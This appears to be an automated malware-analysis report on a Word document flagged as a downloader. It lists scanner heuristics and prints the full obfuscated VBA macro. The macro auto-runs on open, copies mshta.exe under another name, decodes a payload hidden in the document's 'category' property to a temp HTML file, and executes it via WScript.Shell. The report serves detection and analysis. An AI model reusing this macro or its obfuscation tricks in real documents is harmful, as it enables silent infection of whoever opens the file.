MALICIOUS
138
Risk Score
Heuristics 6
-
ClamAV: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Call CreateObject("ws" + asFOSt + "ell").run(adteU) -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
aEcUJs = Environ(a6R0u) -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
- http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
- http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 13503 bytes |
SHA-256: 8f736866f4bb56092fa418ac66d9e308b277b3d194e00d6f6f81fd9400725e31 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "a7q8j"
Sub AutoOpen()
a9AjDY
End Sub
Attribute VB_Name = "apiXP"
Public Const a2t7A As String = ""
Public Const aIC82y As Integer = 19383 / 1491
Public Const aVklcx As String = "1ridn1iw1"
Public Const a7iRb As String = "231met1sys1"
Public Const aXY6eU As String = "p1m1e1t"
Public Const asFOSt As String = "cript.sh"
Function aVcl3()
' Metaphorical detection oftentimes itch
' Enliven pts
' Somewhat shorten wan liturgy
' Specifies personal but espionage
' Woodsman
' Sorted voyeurweb ranch arbitration
' Legend
' Authentication flickered ottawa
' Beginners overnight forswear rough
' Fermented
' Wicker groove
End Function
Sub aKfM0g(almk6y)
' Matthew sacred substantial incomplete
' Transcending melbourne retention
' Courtship liabilities sarcophagus bb negligent interventions
' Chimerical
' Mammal lie slime
' Venue vitriol venue
' Man-at-arms fry antenna redoubtable informed matins
' Examines vernacular
' Cassette damaged square agility
' Respiratory examined diagnostic serial musk
' Mysimon highly mechanic
' Uncertainty imprudent
' Bravo artist
' Karaoke hypnotism method loquacious felt
' Personals greens blackberry entangle users
' Polemical domestic explain uk
' Bludgeon
' Generous
' Moderator
' Drastic matt annie sometimes
' Seats
' Assessment reveals wit.
' Silicon dee surprise
' Invest neuter
' Rambling incomparable excluded tacks jacobus algorithm
' Tyson parliamentary democrat hoist
' Fustian dev pen
' Oneness fusion courtship originating garage
' Laughable tonic trapper troupe garcia
' Volvo debatable bridges saucy surreptitious principle disk
' Utah liturgy clark
' Companion abridged undermine easy
' Associating novelty
' Billow thin austria
' Electronics ag postman
' Theta ashley put
' Stationery n needs pique killing norway
' Balm pathology
' Spreading overhear workshop
' Ne owns rolls alumina
' Construct targets gazelle cars hygienic
' Suzuki bibliography urgently disconcerting nee diffuse sunday
' Postings paxil ja
' Screw knightly sedition
' Welch battery vedic combines retailers espn
' Hebrides consultant pissing kilometers bankruptcy
' Fisheries obituary
' Missed hitch intolerance
' Vat conduit rg tepee joe.
' Everybody smallest pure
' Disreputable compatible curves
' Norma bloodshot kathy investigation
' Weal dido brighton
' F roguish chi
' Intensity puppies
' Notoriety
End Sub
Function aMXBLS(aOGvmp)
' Oval
' Kennel seasoned which
' Suave drums oxfordshire pirates barricade
' Fume beginning acts circus fundamentally
' Weapon
' Shakira unshaven downloadable sepulchral ill.
' Holocaust dishes movement
' Armenian pp manoeuvre antiquary
' Retro wav panel overthrew
' Mulberry bigamy idioms
' Approximation delphi interventions nipple
' Colt
aMXBLS = ActiveDocument.BuiltInDocumentProperties(aOGvmp)
End Function
Public Sub ayF85A()
' Savings strictness sitting
' Remedial 404 verification curriculum hull
' Prediction optimist expatiate thereabouts
' Bleached qualification red
' Flooring deft l seeing sunless
' Entrails partnerships dejection tether mutable guaranteed
' Wrestling hits aristocrat semester arbitrator
' Kevin l
' Astronomy dandy lows viruses
' Award hamburg venal northwest
' Alaska publishing artificially sedge bavarian bang
aKc0Hd
End Sub
Public Sub a31Mm()
' Arcade objective partook equatorial ivory
aUvRm
End Sub
Attribute VB_Name = "an9mRQ"
Public Function af1zOU(aSbueH, aR53O)
' Clip rides effect gamecube
' Nh campus
' Pest occurred
' Monster peace illustrated armistice
' Mess odorous intonation conducive
' Immigration
' Convert mix silly
' Bemoan
' Warming urns domestic
' Rapt easterly chan liberated phalanx degenerate
' Paunch terrorism unwashed character
' Excess cord unkempt limitation giggling
' Re really plenty waste
' Closely presidency bellow
' Mushroom choir firewire
' Victorian jeer offset beeves
' Th eighty-four religious
' Authority loth usb
' Puppies
' Rawhide editions notre earthenware jury
' Copyist repulse else
' Computing applicants partial
' Maintains junk honeymoon affable operations
' Recommended feasibility tar wrapped
' Carb manually
' Measured
' Inverness
' Able ci fortify lottery argument threaded
' Fifty-six monday
' Nutmeg proven arthur empirical shock
' Mephistopheles extradition analyze
' Complaints nasty
' Upbringing blogging despite disagreed consumes
FileNumber = FreeFile
Open aSbueH For Output As #FileNumber
Print #FileNumber, aR53O
' Demi terrier
' Victorian fleet warm surpassing
' Inducing
' Crypt recorder rood stilts pungent bug raucous
' Cent manoeuvre elevate sensors
' Reservations reciprocate
' Keyboard op. estate almond
' Token
' Proven mother-of-pearl exponent sacramento
' Yards unrestrained thereby
' Samurai pigment birmingham
Close #FileNumber
End Function
Sub aFVAi(ai368F, aCkzj5)
' Ironic
' Victor
' Phantom americas
' Astrology newark tongue godless
' Detroit doer accosted
' Adown intrinsic sep society ark. chromatic
' Suspiciously remember been
' Seaport
' Emulate operation dying physician
' Intelligent scottish
' Expects ufo
' Leprosy def analogies
' Lake enterprises memorandum spiritual
FileCopy ai368F, aCkzj5
End Sub
Function aEnkW(aJ1blg)
' Compulsory wearer
' Existent improvident tan
' Cree pence satirical works skirted
' Minutes
' Endearment sharon chops
' Libs
' Troubleshooting directed aircraft ste. disquisition
' Tongue tassel nominee reasonably deviant
' Concord seq sardinian upturned collins
' Estimates programs equinox roger openings
' Simile
aEnkW = aJ1blg
End Function
Function aQlJP(aJ1blg) As String
Dim aL1TVh As Long
Dim avT1L As Integer
Dim azHgEW As Integer
For aL1TVh = 1 To Len(aJ1blg)
azHgEW = 0
' Condolence examined
a36L1 = Mid(aJ1blg, aL1TVh, 1)
avT1L = Asc(a36L1)
If (avT1L > anrNi2(-8664 + 8665) And avT1L < anrNi2(26836 / 13418)) Or (avT1L > anrNi2(9764 - 9761) And avT1L < anrNi2(-147 + 151)) Then
azHgEW = aIC82y
' Pugnacious tilt
' Cure assumed medusa
' Cuisine retarded reversal falter silky humdrum
' Boring co-operate
' Variables cultivates rm gangway cn
' Political boatswain blinking commissioners though
' Inexpensive integral cab concentric indicating
' Algeria patronize very exterminate lunch camping
' Gibraltar gp flyer
' Greenhouse allegation carrot
' Og crags
avT1L = aTEyJ6(avT1L, azHgEW)
If avT1L < anrNi2(5) And avT1L > 83 Then
avT1L = aAZOY3(avT1L)
ElseIf avT1L < 527 - 462 Then
avT1L = aAZOY3(avT1L)
End If
End If
' Cables cb intervention
' Orchestral
' Alias permissible
' Reggie ornamentation orpheus
' Creator hight staggers
' Lighter hard
' Induction washing
' Chunks iso meed texture
' Effie obtainable cbs glut
' Chemicals wi mister
aQrtNn = aHokFV(avT1L)
' Una
' Balustrade skylight
Mid$(aJ1blg, aL1TVh, 1) = aEnkW(aQrtNn)
Next aL1TVh
aQlJP = aJ1blg
End Function
Attribute VB_Name = "awLcX"
Function aW3Bc8(aBToD0)
' Yugoslavia hampshire elevate
' Addiction technician advanced
' Ven indicator missus amanda tardy
' Advertiser ordain
' Wince loc headgear tract truck knoll satyr
' Efficient refine tagged
' Tree push
' Qualities
' Coasting skiing cognizance
' Clandestinely venom swingers crochet
' Th
ad6sm = aBToD0
aIcfP = Len(ad6sm)
For avGrV = 0 To aIcfP - 1
' Polo palate intoxicating
' Aboriginal rutland
a4do1 = a4do1 & Mid(ad6sm, (aIcfP - avGrV), 1)
Next avGrV
aW3Bc8 = a4do1
End Function
Public Function aZQ0s(aFU5I)
aZQ0s = Replace(aFU5I, a2t7A, "")
End Function
Sub a9AjDY()
' Atheist lined hunts skating lobby malaria
' Aberration systematically ferrari slot reproductive buckle bulgaria abler
' Deluxe cowslip misdemeanor colleges subservient
' Sardinia dpi subscriber marmalade mega
' Halo arroyo radial decorum
' Rv plays equitable cons foster
' Advertise nugget
' Staple yew
' Nbc somber
' Craftsman genitive
' Bytes peacock combined tuition
' Highly romance vented urgently
' Service completion
' Reference currently
' Baseball cold perdition
' Resumes
' Americans referred lv yeast westerly
' Christians myanmar nuclear
' Rosette isolation
' Disable gangway
' Ilk quid
ayF85A
a31Mm
' Funereal loudness
' Gloves
' Necessarily hawser fealty smuggle exasperation
' Observed bryant phalanx seq
' Fresher appreciation
' Concerns beguiling drove mean prep lynching
' Declension hir presenting oxide betimes
' Ups unavoidable ghana rumble
' Practitioners bare economies
' Credibility parallel
Call CreateObject("ws" + asFOSt + "ell").run(adteU)
End Sub
Attribute VB_Name = "akKCQw"
Function aEcUJs(a6R0u)
' Misc
' Wiry
' Meteor obstruct marital timorous
' Conditional prate small startle writers
' Representations one-sided articulation squabble
' Pl chorus surrounded totals
' Adjunct unborn reason reseller engrossing obeisance
' Compress
' Jauntily antelope fiddler
' Mas smithy anthea meter
' Matting halter
aEcUJs = Environ(a6R0u)
End Function
Function a0lN7()
' Cowed responses nextel gad extraordinary
' Zurich nowhere
' Wicked hulk panasonic indisputable always
' Mode profession
' Prisoner
' Viands forsook parasite
' Poll boris strapping scouting
' Slough hydrogen primordial
' Whomsoever
' Attorneys flail chime
' Certified cvs fluffy dredge cameras
With Application
a0lN7 = .PathSeparator
End With
End Function
Function a6WwJq(aXnpG)
' Ado aviator ungenerous ailed
' Unctuous kind wesley
' Residential bewildering comparable howard latter
' Cycle
' Cajole
' Shemale cracker ranger searching
' Interloper buffer
' Neighbor assessments html
' Voip crispin mashed realistic penetration
' Souls partnerships
az6UMw = VBA.Split(aW3Bc8("lmth.ni|moc.ni|exe.athsm"), "|")
' Station gs
' Spin african
' Suzerainty recording surplus knoll you
' Hankering
' Department sedimentary
' Owned articulated vice
' Consist parent adorable
' Agents pdas umpire label nepal runner
' Declaration
' Estuary lightbox retribution admit petersburg leaking
' Wrongly wish perspicuity addicted
' Lexington equivalent wither
' Timorous pell-mell bald everything
' Flinching hr fran dissuade
' Poise
' Mpg hundredweight sensory
' Platinum copied fissure mailing
' Profligate whosoever evangelist
' Sanity halloween hacking impaired oe thus
' Flows biographical sheets augustinian ottawa metrical
' Harmonize unacceptable
' Superfluity felicitous arctic imaging
Select Case aXnpG
' Firemen
Case 0:
a6WwJq = aEcUJs(Replace(aW3Bc8(aVklcx), "1", "")) & a0lN7 & Replace(aW3Bc8(a7iRb), "1", "") & a0lN7 & az6UMw(0)
' Sepulchral mud airfare amidships crazy gotta oven
Case 1:
' Deputy
' Pall use spiral parks condos father
' Overdo
' Project movements
' Blasphemous dividend
' Windpipe describe easel
' Force citations collation discussed
' Killer pat cbs
' Covered outcast incipient california refresh
' Viking refuse waiver refraction truth
' Paths bring agree currencies argued
a6WwJq = aEcUJs(Replace(aW3Bc8(aXY6eU), "1", "")) & a0lN7 & az6UMw(1)
Case 2:
' Bad
a6WwJq = aEcUJs(Replace(aW3Bc8(aXY6eU), "1", "")) & a0lN7 & az6UMw(2)
End Select
End Function
Sub aUvRm()
aUJDm = aixC6O(a6WwJq(2))
af1zOU aUJDm, aQlJP(aMXBLS("category"))
End Sub
Attribute VB_Name = "ajXf4Y"
Function a4xYX(aJUOGB)
' Tendril featuring mongolia
' Sloped mama charles lie fuel
' Uplift rocked gold apex
' Ranks rooms
' Said tomatoes light example tunes inborn makeshift
' Mitigate
' Crown persona involve lees
' Plaid wainscot erotic
' Honest midlands uterus
' Juxtaposition po
' Contentious automobile routes
' Fawn maddening ya
' Conviction ply surprising rhea dishonor
' Pennon hewlett guest optimistic
' Usury
' Receptacle ofries waiting continually
' Stations supply
' Compact running rama
' Ham
' Installation births tulle brooks americanism
' Un conserve
a4xYX = (aZQ0s(aJUOGB))
End Function
Function a01mq(as8GS)
a01mq = (aZQ0s(as8GS))
End Function
Function aixC6O(al0z5m)
' Stilted potter
aixC6O = (aZQ0s(al0z5m))
End Function
Function adteU()
aJXCT8 = a01mq(a6WwJq(1))
abAhD = aixC6O(a6WwJq(2))
adteU = aJXCT8 & " " & abAhD
End Function
Attribute VB_Name = "aIN9wX"
Sub aKc0Hd()
aNBQ4 = a4xYX(a6WwJq(0))
aFqO2K = a01mq(a6WwJq(1))
aFVAi aNBQ4, aFqO2K
End Sub
Function aAZOY3(abXUhS)
aAZOY3 = abXUhS + 1273 - 1247
End Function
Function anrNi2(ah6FR)
If ah6FR = 0 Then
anrNi2 = 12587 / 12587
ElseIf ah6FR = 1 Then
anrNi2 = -243 + 307
ElseIf ah6FR = 2 Then
anrNi2 = 27573 / 303
ElseIf ah6FR = 3 Then
anrNi2 = -11 + 107
ElseIf ah6FR = 4 Then
anrNi2 = 11193 / 91
ElseIf ah6FR = 5 Then
anrNi2 = 297 - 200
Else
anrNi2 = 1027 - 3
End If
End Function
Function aTEyJ6(abXUhS, aYTad)
aTEyJ6 = abXUhS - aYTad
End Function
Function aHokFV(abXUhS)
aHokFV = VBA.ChrW(abXUhS)
' Cottage magical tortoise hire
' Sectors order honey dosage
' Stampede
' Mains acquisition arbitrator maneuver coating navigator robust woo
' Unexpected crochet whilst
' Turbo
' Premeditation proboscis furniture
' Overview gravity
' Carp jaunt forty-three
' Appliance heat component powell all-powerful
' Disciplines clinical bloodthirsty
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 53248 bytes |
SHA-256: 5a0131e7445b6e0f35b55c29cf9db93262f95f198fd1bd41ea90f8a73afeb540 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.